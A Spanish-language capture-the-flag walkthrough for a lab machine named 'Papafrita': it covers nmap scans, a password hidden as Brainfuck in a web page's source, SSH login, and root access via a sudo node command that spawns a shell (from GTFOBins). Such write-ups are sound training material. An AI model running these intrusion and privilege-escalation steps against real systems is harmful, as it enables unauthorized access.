# Papafrita

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.1.80
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FVH9P5BmqD0b7skeuoAhr%2Fimage.png?alt=media&#x26;token=ec0afa70-7e76-4a79-bc78-a613808c2155" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 192.168.1.80
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FYYFETgwDe0eWQ6ZRp9Ub%2Fimage.png?alt=media&#x26;token=db07289b-a04f-4fa5-9c91-9e16262a5bdc" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 192.168.1.80
```

para obtener más información sobre ese puerto específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FADf5tlk4E1lgzeXlFuM4%2Fimage.png?alt=media&#x26;token=47bf44ea-75f0-4d68-89b4-6729efd51fb8" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora exploramos el servicio **HTTP**. Ingresamos la IP y nos encontramos la página de por defecto de **Apache**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FN00IjlFz76oUxVqIwWXU%2Fimage.png?alt=media&#x26;token=08528954-4c87-4d78-b169-b3f8191da07a" alt=""><figcaption></figcaption></figure>

Revisamos el código fuente y nos encontramos con un código escrito en **Brainfuck** por lo que desencriptamos.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FJVMqQIMdA5xGRJujquOg%2Fimage.png?alt=media&#x26;token=094d0261-59a0-4a6c-8f12-f3ec1f72d814" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FvOqMQdD5SjCVJCTnrSEm%2Fimage.png?alt=media&#x26;token=b2d2b6fd-896a-46ef-aa52-811b7d903902" alt=""><figcaption></figcaption></figure>

Parece ser que **abuelacalientalasopa** es una contraseña por lo que suponemos con la lógica que el usuario es **abuela**. Sabiendo esto, nos conectamos a través de **SSH** al usuario con el comando:

```bash
ssh abuela@192.168.1.80
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FIcDBSSqtdN1iVIUA5bqc%2Fimage.png?alt=media&#x26;token=df0b3ede-843b-49a3-b8b7-5cf36de46fd1" alt=""><figcaption></figcaption></figure>

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FBM5v3cl8TmTlz4uP4tlx%2Fimage.png?alt=media&#x26;token=45c8e896-58dd-40e6-9358-72179a7619d6" alt=""><figcaption></figcaption></figure>

Vemos que tenemos permisos sudo con **node** por lo que miramos [GTFOBins](https://gtfobins.github.io/gtfobins/node/) para ver como podemos escalar privilegios.

```bash
sudo -u root node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
```

Ya somos **root**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FcZtoK49G91a198sCAscL%2Fimage.png?alt=media&#x26;token=4b302bb8-4663-4a82-9914-10908bd7a7bb" alt=""><figcaption></figcaption></figure>

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀
